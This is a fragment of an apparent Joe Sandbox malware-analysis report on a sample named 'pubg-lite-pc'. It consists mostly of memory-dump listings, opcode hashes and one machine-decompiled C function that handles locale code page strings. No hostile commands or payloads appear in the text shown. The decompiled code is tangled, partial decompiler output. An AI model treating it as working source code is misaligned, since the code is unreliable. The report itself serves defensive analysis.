                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9616ab3889fed0022121b0ce3cedb0ddf0d4cd2733e6b9adb6a9b4cabab7b6dc
                                                                                                • Instruction ID: ad85f705f80a7e5bb709d6cdf1d04afa8da954b9c4be705e43529c9e555aa117
                                                                                                • Opcode Fuzzy Hash: 9616ab3889fed0022121b0ce3cedb0ddf0d4cd2733e6b9adb6a9b4cabab7b6dc
                                                                                                • Instruction Fuzzy Hash: 6402E572A002159FDB18DF68CC95AAEB7B9FB95310F15422EE815D7391EB30AD05CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A4ED90 Relevance: .4, Instructions: 450COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b05ae4f80f7509a32de44432c68ea94d91a006e60ef832b6bd34005e90716120
                                                                                                • Instruction ID: 5560f579505b3c6a9f791d034cc5e09bda2a662610bb9adad7cd3521bf1732eb
                                                                                                • Opcode Fuzzy Hash: b05ae4f80f7509a32de44432c68ea94d91a006e60ef832b6bd34005e90716120
                                                                                                • Instruction Fuzzy Hash: 27F15E75E01219DFDF14CFA8C9806AEBBB1FF88314F258269D919AB345D731AD05CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00951380 Relevance: .4, Instructions: 360COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 38fbb7fd3aa8cd939159b12f24ad843b6adb007cd76a245974034e014adef1eb
                                                                                                • Instruction ID: ce4e513a3d777620a7b0451a4cce091667080c87827131c8af2d55036835c7c2
                                                                                                • Opcode Fuzzy Hash: 38fbb7fd3aa8cd939159b12f24ad843b6adb007cd76a245974034e014adef1eb
                                                                                                • Instruction Fuzzy Hash: 61F12574A01609CFDB14CF9AC584BAEBBF6FF88311F298659D815AB394D734AD05CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D9A2CC5 Relevance: .3, Instructions: 327COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 71%
                                                                                                			E6D9A2CC5(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v32;
				char _v36;
				char _v136;
				signed int _v140;
				intOrPtr* _v168;
				signed int _v180;
				char _v272;
				char _v420;
				signed int _v448;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t93;
				signed int _t97;
				void* _t99;
				intOrPtr _t111;
				void* _t113;
				signed int _t115;
				signed int _t119;
				intOrPtr _t127;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				intOrPtr _t147;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t153;
				void* _t163;
				intOrPtr _t165;
				void* _t168;
				void* _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				signed int _t175;
				void* _t177;
				void* _t180;
				intOrPtr* _t181;
				signed int _t201;
				intOrPtr* _t203;
				intOrPtr* _t214;
				signed int _t216;
				intOrPtr* _t217;
				intOrPtr* _t222;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				signed int _t232;
				intOrPtr* _t234;
				intOrPtr* _t236;
				intOrPtr* _t238;
				void* _t241;
				void* _t242;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr* _t246;
				intOrPtr* _t250;
				intOrPtr* _t251;
				signed int _t252;
				void* _t253;
				void* _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				void* _t259;
				signed int _t260;

				_t93 =  *0x6d9e5024; // 0xe85bfa76
				_v8 = _t93 ^ _t256;
				_t250 = _a4;
				_t253 = E6D996E32(__ecx, __edx);
				asm("sbb ecx, ecx");
				_t97 = L6D99A30B(_t250, ( ~( *(_t253 + 0x64)) & 0xfffff005) + 0x1002,  &_v136, 0x40);
				if(_t97 != 0) {
					_push(__ebx);
					_t99 = L6D9917BA(_t250, _t253,  *((intOrPtr*)(_t253 + 0x54)),  &_v136);
					_t175 = 0;
					_v140 = 0;
					if(_t99 != 0) {
						L15:
						if(( *(_t253 + 0x58) & 0x00000300) == 0x300) {
							L47:
							goto L48;
						} else {
							asm("sbb ecx, ecx");
							if(L6D99A30B(_t250, ( ~( *(_t253 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
								if(L6D9917BA(_t250, _t253,  *((intOrPtr*)(_t253 + 0x50)),  &_v136) != 0) {
									goto L47;
								} else {
									_t201 =  *(_t253 + 0x58) | 0x00000200;
									 *(_t253 + 0x58) = _t201;
									if( *(_t253 + 0x60) == _t175) {
										if( *((intOrPtr*)(_t253 + 0x5c)) == _t175) {
											L43:
											_t62 = _t253 + 0x2a0; // 0x2a0
											_t240 = _t62;
											 *(_t253 + 0x58) = _t201 | 0x00000100;
											if( *_t62 != _t175) {
												goto L47;
											} else {
												_t203 = _t250;
												_t177 = _t203 + 2;
												do {
													_t111 =  *_t203;
													_t203 = _t203 + 2;
												} while (_t111 != _v140);
												goto L46;
											}
										} else {
											_t246 =  *((intOrPtr*)(_t253 + 0x50));
											_t180 = _t246 + 2;
											do {
												_t147 =  *_t246;
												_t246 = _t246 + 2;
											} while (_t147 != _v140);
											if(_t246 - _t180 >> 1 !=  *((intOrPtr*)(_t253 + 0x5c))) {
												_t175 = 0;
												goto L43;
											} else {
												if(L6D9A315A(_t201, _t253, _t250) != 0) {
													L38:
													 *(_t253 + 0x58) =  *(_t253 + 0x58) | 0x00000100;
													_t59 = _t253 + 0x2a0; // 0x2a0
													_t240 = _t59;
													if( *_t59 != 0) {
														goto L47;
													} else {
														_t225 = _t250;
														_t177 = _t225 + 2;
														do {
															_t150 =  *_t225;
															_t225 = _t225 + 2;
														} while (_t150 != _v140);
														goto L46;
													}
												} else {
													_t181 =  *((intOrPtr*)(_t253 + 0x50));
													_t226 = _t181 + 2;
													do {
														_t151 =  *_t181;
														_t181 = _t181 + 2;
													} while (_t151 != 0);
													if(E6D9A2C91( *((intOrPtr*)(_t253 + 0x50))) == _t181 - _t226 >> 1) {
														goto L47;
													} else {
														goto L38;
													}
												}
											}
										}
									} else {
										_t45 = _t253 + 0x2a0; // 0x2a0
										_t240 = _t45;
										 *(_t253 + 0x58) = _t201 | 0x00000100;
										if( *_t45 != _t175) {
											goto L47;
										} else {
											_t229 = _t250;
											_t177 = _t229 + 2;
											do {
												_t153 =  *_t229;
												_t229 = _t229 + 2;
											} while (_t153 != _v140);
											L46:
											_t205 = _t203 - _t177 >> 1;
											_push((_t203 - _t177 >> 1) + 1);
											_t113 = L6D9A2AB4(_t240, 0x55, _t250);
											_t260 = _t259 + 0x10;
											if(_t113 != 0) {
												_t175 = 0;
												goto L51;
											} else {
												goto L47;
											}
										}
									}
								}
							} else {
								 *(_t253 + 0x58) = _t175;
								goto L18;
							}
						}
					} else {
						asm("sbb eax, eax");
						if(L6D99A30B(_t250, ( ~( *(_t253 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
							_t163 = L6D9917BA(_t250, _t253,  *((intOrPtr*)(_t253 + 0x50)),  &_v136);
							_t232 =  *(_t253 + 0x58);
							if(_t163 != 0) {
								if((_t232 & 0x00000002) != 0) {
									goto L15;
								} else {
									if( *((intOrPtr*)(_t253 + 0x5c)) == 0) {
										L19:
										if(( *(_t253 + 0x58) & 0x00000001) != 0 || L6D9A315A(_t232, _t253, _t250) == 0) {
											goto L15;
										} else {
											 *(_t253 + 0x58) =  *(_t253 + 0x58) | 0x00000001;
											_t234 = _t250;
											_t240 = _t234 + 2;
											do {
												_t165 =  *_t234;
												_t234 = _t234 + 2;
											} while (_t165 != _t175);
											goto L14;
										}
									} else {
										_t170 = L6D991B42(0, _t250, _t253,  *((intOrPtr*)(_t253 + 0x50)),  &_v136,  *((intOrPtr*)(_t253 + 0x5c)));
										_t259 = _t259 + 0xc;
										if(_t170 != 0) {
											goto L19;
										} else {
											 *(_t253 + 0x58) =  *(_t253 + 0x58) | 0x00000002;
											_t236 = _t250;
											_t240 = _t236 + 2;
											do {
												_t171 =  *_t236;
												_t236 = _t236 + 2;
											} while (_t171 != 0);
											goto L14;
										}
									}
								}
							} else {
								 *(_t253 + 0x58) = _t232 | 0x00000304;
								_t238 = _t250;
								_t240 = _t238 + 2;
								do {
									_t172 =  *_t238;
									_t238 = _t238 + 2;
								} while (_t172 != 0);
								L14:
								_t205 = _t234 - _t240 >> 1;
								_push((_t234 - _t240 >> 1) + 1);
								_t29 = _t253 + 0x2a0; // 0x2a0
								_t168 = L6D9A2AB4(_t29, 0x55, _t250);
								_t260 = _t259 + 0x10;
								if(_t168 != 0) {
									L51:
									_push(_t175);
									_push(_t175);
									_push(_t175);
									_push(_t175);
									_push(_t175);
									E6D98EBAC();
									asm("int3");
									_push(_t256);
									_t257 = _t260;
									_t115 =  *0x6d9e5024; // 0xe85bfa76
									_v180 = _t115 ^ _t257;
									_push(_t253);
									_push(_t250);
									_t251 = _v168;
									_t254 = E6D996E32(_t205, _t240);
									asm("sbb ecx, ecx");
									_t119 = L6D99A30B(_t251, ( ~( *(_t254 + 0x60)) & 0xfffff002) + 0x1001,  &_v420, 0x78);
									if(_t119 != 0) {
										if(L6D9917BA(_t251, _t254,  *((intOrPtr*)(_t254 + 0x50)),  &_v272) != 0) {
											L58:
											goto L59;
										} else {
											_t214 = _t251;
											_push(_t175);
											_t241 = _t214 + 2;
											do {
												_t127 =  *_t214;
												_t214 = _t214 + 2;
											} while (_t127 != 0);
											_t216 = _t214 - _t241 >> 1;
											_push(_t216 + 1);
											_t79 = _t254 + 0x2a0; // 0x2a0
											if(L6D9A2AB4(_t79, 0x55, _t251) != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E6D98EBAC();
												asm("int3");
												_push(_t257);
												_push(_t216);
												_push(_t254);
												_t255 = _v448;
												_push(_t251);
												if(_t255 == 0) {
													L87:
													_push(2);
													_push( &_v36);
													_push(0x20001004);
												} else {
													_t252 = 0;
													if( *_t255 == 0) {
														goto L87;
													} else {
														_t217 = L"ACP";
														_t139 = _t255;
														while(1) {
															_t242 =  *_t139;
															if(_t242 !=  *_t217) {
																break;
															}
															if(_t242 == 0) {
																L68:
																_t140 = _t252;
															} else {
																_t245 =  *((intOrPtr*)(_t139 + 2));
																if(_t245 !=  *((intOrPtr*)(_t217 + 2))) {
																	break;
																} else {
																	_t139 = _t139 + 4;
																	_t217 = _t217 + 4;
																	if(_t245 != 0) {
																		continue;
																	} else {
																		goto L68;
																	}
																}
															}
															L70:
															if(_t140 == 0) {
																goto L87;
															} else {
																if(L6D9917BA(_t252, _t255, _t255, L"utf8") == 0 || L6D9917BA(_t252, _t255, _t255, L"utf-8") == 0) {
																	L84:
																	return 0xfde9;
																}
																_t222 = L"OCP";
																_t143 = _t255;
																while(1) {
																	_t243 =  *_t143;
																	if(_t243 !=  *_t222) {
																		break;
																	}
																	if(_t243 != 0) {
																		_t244 =  *((intOrPtr*)(_t143 + 2));
																		if(_t244 !=  *((intOrPtr*)(_t222 + 2))) {
																			break;
																		} else {
																			_t143 = _t143 + 4;
																			_t222 = _t222 + 4;
																			if(_t244 != 0) {
																				continue;
																			} else {
																			}
																		}
																	}
																	L80:
																	if(_t252 != 0) {
																		return L6D9934C9(_t222, _t255);
																	}
																	_push(2);
																	_push( &_v36);
																	_push(0x2000000b);
																	goto L82;
																}
																asm("sbb edi, edi");
																_t252 = _t252 | 0x00000001;
																goto L80;
															}
															goto L82;
														}
														asm("sbb eax, eax");
														_t140 = _t139 | 0x00000001;
														goto L70;
													}
												}
												L82:
												_push(_v20 + 0x250);
												if(L6D99A30B() == 0) {
													return 0;
												}
												_t137 = _v36;
												if(_t137 < 3) {
													goto L84;
												}
												return _t137;
											} else {
												 *(_t254 + 0x58) =  *(_t254 + 0x58) | 0x00000004;
												goto L58;
											}
										}
									} else {
										 *(_t254 + 0x58) =  *(_t254 + 0x58) & _t119;
										L59:
										return L6D98A13F(_v32 ^ _t257);
									}
								} else {
									goto L15;
								}
							}
						} else {
							 *(_t253 + 0x58) =  *(_t253 + 0x58) & 0;
							L18:
							L48:
							goto L49;
						}
					}
				} else {
					 *(_t253 + 0x58) =  *(_t253 + 0x58) & _t97;
					L49:
					return L6D98A13F(_v8 ^ _t256);
				}
			}








































































                                                                                                0x6d9a2cd0
                                                                                                0x6d9a2cd7
                                                                                                0x6d9a2cdc
                                                                                                0x6d9a2ce4
                                                                                                0x6d9a2cf4
                                                                                                0x6d9a2d04
                                                                                                0x6d9a2d0b
                                                                                                0x6d9a2d16
                                                                                                0x6d9a2d21
                                                                                                0x6d9a2d26
                                                                                                0x6d9a2d28
                                                                                                0x6d9a2d32
                                                                                                0x6d9a2df5
                                                                                                0x6d9a2e01
                                                                                                0x6d9a2f7c
                                                                                                0x00000000
                                                                                                0x6d9a2e07
                                                                                                0x6d9a2e14
                                                                                                0x6d9a2e2c
                                                                                                0x6d9a2e76
                                                                                                0x00000000
                                                                                                0x6d9a2e7c
                                                                                                0x6d9a2e7f
                                                                                                0x6d9a2e85
                                                                                                0x6d9a2e8b
                                                                                                0x6d9a2ec1
                                                                                                0x6d9a2f3c
                                                                                                0x6d9a2f42
                                                                                                0x6d9a2f42
                                                                                                0x6d9a2f48
                                                                                                0x6d9a2f4e
                                                                                                0x00000000
                                                                                                0x6d9a2f50
                                                                                                0x6d9a2f50
                                                                                                0x6d9a2f52
                                                                                                0x6d9a2f55
                                                                                                0x6d9a2f55
                                                                                                0x6d9a2f58
                                                                                                0x6d9a2f5b
                                                                                                0x00000000
                                                                                                0x6d9a2f55
                                                                                                0x6d9a2ec3
                                                                                                0x6d9a2ec3
                                                                                                0x6d9a2ec6
                                                                                                0x6d9a2ec9
                                                                                                0x6d9a2ec9
                                                                                                0x6d9a2ecc
                                                                                                0x6d9a2ecf
                                                                                                0x6d9a2edf
                                                                                                0x6d9a2f3a
                                                                                                0x00000000
                                                                                                0x6d9a2ee1
                                                                                                0x6d9a2eea
                                                                                                0x6d9a2f10
                                                                                                0x6d9a2f10
                                                                                                0x6d9a2f17
                                                                                                0x6d9a2f17
                                                                                                0x6d9a2f22
                                                                                                0x00000000
                                                                                                0x6d9a2f24
                                                                                                0x6d9a2f24
                                                                                                0x6d9a2f26
                                                                                                0x6d9a2f29
                                                                                                0x6d9a2f29
                                                                                                0x6d9a2f2c
                                                                                                0x6d9a2f2f
                                                                                                0x00000000
                                                                                                0x6d9a2f38
                                                                                                0x6d9a2eec
                                                                                                0x6d9a2eec
                                                                                                0x6d9a2ef1
                                                                                                0x6d9a2ef4
                                                                                                0x6d9a2ef4
                                                                                                0x6d9a2ef7
                                                                                                0x6d9a2efa
                                                                                                0x6d9a2f0e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a2f0e
                                                                                                0x6d9a2eea
                                                                                                0x6d9a2edf
                                                                                                0x6d9a2e8d
                                                                                                0x6d9a2e93
                                                                                                0x6d9a2e93
                                                                                                0x6d9a2e99
                                                                                                0x6d9a2e9f
                                                                                                0x00000000
                                                                                                0x6d9a2ea5
                                                                                                0x6d9a2ea5
                                                                                                0x6d9a2ea7
                                                                                                0x6d9a2eaa
                                                                                                0x6d9a2eaa
                                                                                                0x6d9a2ead
                                                                                                0x6d9a2eb0
                                                                                                0x6d9a2f64
                                                                                                0x6d9a2f66
                                                                                                0x6d9a2f6b
                                                                                                0x6d9a2f70
                                                                                                0x6d9a2f75
                                                                                                0x6d9a2f7a
                                                                                                0x6d9a2f98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a2f7a
                                                                                                0x6d9a2e9f
                                                                                                0x6d9a2e8b
                                                                                                0x6d9a2e2e
                                                                                                0x6d9a2e2e
                                                                                                0x00000000
                                                                                                0x6d9a2e2e
                                                                                                0x6d9a2e2c
                                                                                                0x6d9a2d38
                                                                                                0x6d9a2d46
                                                                                                0x6d9a2d5b
                                                                                                0x6d9a2d6f
                                                                                                0x6d9a2d76
                                                                                                0x6d9a2d7b
                                                                                                0x6d9a2d9b
                                                                                                0x00000000
                                                                                                0x6d9a2d9d
                                                                                                0x6d9a2da0
                                                                                                0x6d9a2e39
                                                                                                0x6d9a2e3d
                                                                                                0x00000000
                                                                                                0x6d9a2e4a
                                                                                                0x6d9a2e4a
                                                                                                0x6d9a2e4e
                                                                                                0x6d9a2e50
                                                                                                0x6d9a2e53
                                                                                                0x6d9a2e53
                                                                                                0x6d9a2e56
                                                                                                0x6d9a2e59
                                                                                                0x00000000
                                                                                                0x6d9a2e5e
                                                                                                0x6d9a2da6
                                                                                                0x6d9a2db3
                                                                                                0x6d9a2db8
                                                                                                0x6d9a2dbd
                                                                                                0x00000000
                                                                                                0x6d9a2dbf
                                                                                                0x6d9a2dbf
                                                                                                0x6d9a2dc3
                                                                                                0x6d9a2dc5
                                                                                                0x6d9a2dc8
                                                                                                0x6d9a2dc8
                                                                                                0x6d9a2dcb
                                                                                                0x6d9a2dce
                                                                                                0x00000000
                                                                                                0x6d9a2dc8
                                                                                                0x6d9a2dbd
                                                                                                0x6d9a2da0
                                                                                                0x6d9a2d7d
                                                                                                0x6d9a2d83
                                                                                                0x6d9a2d86
                                                                                                0x6d9a2d88
                                                                                                0x6d9a2d8b
                                                                                                0x6d9a2d8b
                                                                                                0x6d9a2d8e
                                                                                                0x6d9a2d91
                                                                                                0x6d9a2dd3
                                                                                                0x6d9a2dd5
                                                                                                0x6d9a2dda
                                                                                                0x6d9a2ddc
                                                                                                0x6d9a2de5
                                                                                                0x6d9a2dea
                                                                                                0x6d9a2def
                                                                                                0x6d9a2f9a
                                                                                                0x6d9a2f9a
                                                                                                0x6d9a2f9b
                                                                                                0x6d9a2f9c
                                                                                                0x6d9a2f9d
                                                                                                0x6d9a2f9e
                                                                                                0x6d9a2f9f
                                                                                                0x6d9a2fa4
                                                                                                0x6d9a2fa7
                                                                                                0x6d9a2fa8
                                                                                                0x6d9a2fb0
                                                                                                0x6d9a2fb7
                                                                                                0x6d9a2fba
                                                                                                0x6d9a2fbb
                                                                                                0x6d9a2fbc
                                                                                                0x6d9a2fc4
                                                                                                0x6d9a2fd4
                                                                                                0x6d9a2fe4
                                                                                                0x6d9a2feb
                                                                                                0x6d9a3006
                                                                                                0x6d9a303e
                                                                                                0x00000000
                                                                                                0x6d9a3008
                                                                                                0x6d9a3008
                                                                                                0x6d9a300a
                                                                                                0x6d9a300d
                                                                                                0x6d9a3010
                                                                                                0x6d9a3010
                                                                                                0x6d9a3013
                                                                                                0x6d9a3016
                                                                                                0x6d9a301d
                                                                                                0x6d9a3022
                                                                                                0x6d9a3024
                                                                                                0x6d9a3037
                                                                                                0x6d9a3059
                                                                                                0x6d9a305a
                                                                                                0x6d9a305b
                                                                                                0x6d9a305c
                                                                                                0x6d9a305d
                                                                                                0x6d9a305e
                                                                                                0x6d9a3063
                                                                                                0x6d9a3066
                                                                                                0x6d9a3069
                                                                                                0x6d9a306a
                                                                                                0x6d9a306b
                                                                                                0x6d9a306e
                                                                                                0x6d9a3071
                                                                                                0x6d9a3149
                                                                                                0x6d9a3149
                                                                                                0x6d9a314e
                                                                                                0x6d9a314f
                                                                                                0x6d9a3077
                                                                                                0x6d9a3077
                                                                                                0x6d9a307c
                                                                                                0x00000000
                                                                                                0x6d9a3082
                                                                                                0x6d9a3082
                                                                                                0x6d9a3087
                                                                                                0x6d9a3089
                                                                                                0x6d9a3089
                                                                                                0x6d9a308f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a3094
                                                                                                0x6d9a30ab
                                                                                                0x6d9a30ab
                                                                                                0x6d9a3096
                                                                                                0x6d9a3096
                                                                                                0x6d9a309e
                                                                                                0x00000000
                                                                                                0x6d9a30a0
                                                                                                0x6d9a30a0
                                                                                                0x6d9a30a3
                                                                                                0x6d9a30a9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a30a9
                                                                                                0x6d9a309e
                                                                                                0x6d9a30b4
                                                                                                0x6d9a30b6
                                                                                                0x00000000
                                                                                                0x6d9a30bc
                                                                                                0x6d9a30cb
                                                                                                0x6d9a3137
                                                                                                0x00000000
                                                                                                0x6d9a3137
                                                                                                0x6d9a30de
                                                                                                0x6d9a30e3
                                                                                                0x6d9a30e5
                                                                                                0x6d9a30e5
                                                                                                0x6d9a30eb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a30f0
                                                                                                0x6d9a30f2
                                                                                                0x6d9a30fa
                                                                                                0x00000000
                                                                                                0x6d9a30fc
                                                                                                0x6d9a30fc
                                                                                                0x6d9a30ff
                                                                                                0x6d9a3105
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a3107
                                                                                                0x6d9a3105
                                                                                                0x6d9a30fa
                                                                                                0x6d9a310e
                                                                                                0x6d9a3110
                                                                                                0x00000000
                                                                                                0x6d9a3146
                                                                                                0x6d9a3112
                                                                                                0x6d9a3117
                                                                                                0x6d9a3118
                                                                                                0x00000000
                                                                                                0x6d9a3118
                                                                                                0x6d9a3109
                                                                                                0x6d9a310b
                                                                                                0x00000000
                                                                                                0x6d9a310b
                                                                                                0x00000000
                                                                                                0x6d9a30b6
                                                                                                0x6d9a30af
                                                                                                0x6d9a30b1
                                                                                                0x00000000
                                                                                                0x6d9a30b1
                                                                                                0x6d9a307c
                                                                                                0x6d9a311d
                                                                                                0x6d9a3125
                                                                                                0x6d9a312d
                                                                                                0x00000000
                                                                                                0x6d9a3156
                                                                                                0x6d9a312f
                                                                                                0x6d9a3135
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a313f
                                                                                                0x6d9a3039
                                                                                                0x6d9a3039
                                                                                                0x00000000
                                                                                                0x6d9a303d
                                                                                                0x6d9a3037
                                                                                                0x6d9a2fed
                                                                                                0x6d9a2fed
                                                                                                0x6d9a3049
                                                                                                0x6d9a3056
                                                                                                0x6d9a3056
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9a2def
                                                                                                0x6d9a2d5d
                                                                                                0x6d9a2d5d
                                                                                                0x6d9a2e31
                                                                                                0x6d9a2f87
                                                                                                0x00000000
                                                                                                0x6d9a2f87
                                                                                                0x6d9a2d5b
                                                                                                0x6d9a2d0d
                                                                                                0x6d9a2d0d
                                                                                                0x6d9a2f88
                                                                                                0x6d9a2f95
                                                                                                0x6d9a2f95

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 3471368781-0
                                                                                                • Opcode ID: 438766e4c8111ab795da3626daa24d27b94783b15ae5c391218a83392aaaa534
                                                                                                • Instruction ID: d65414c31f9401315b93f6f7cd36b33753f908cef2f6704959a48b40fbe91804
                                                                                                • Opcode Fuzzy Hash: 438766e4c8111ab795da3626daa24d27b94783b15ae5c391218a83392aaaa534
                                                                                                • Instruction Fuzzy Hash: 9CB1E6366047029BD7399F26C891BB7B3BCFF45308F58492DEA46C6680EB75E985CB10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A4BF01 Relevance: .2, Instructions: 237COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 467873a6754c4764d54b14cbe13519bb01a58a5093b3363033424afdc3df553b
                                                                                                • Instruction ID: a5c4f3188ba1d9c1fb1c395c298edfb06b84715adb1d58d7ddf16759746855e4
                                                                                                • Opcode Fuzzy Hash: 467873a6754c4764d54b14cbe13519bb01a58a5093b3363033424afdc3df553b
                                                                                                • Instruction Fuzzy Hash: DD61A63C611608D6CB78DB788D817BEB3A5AFD1310F10052EE84FDB292D761DE4A8B21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092E040 Relevance: .1, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
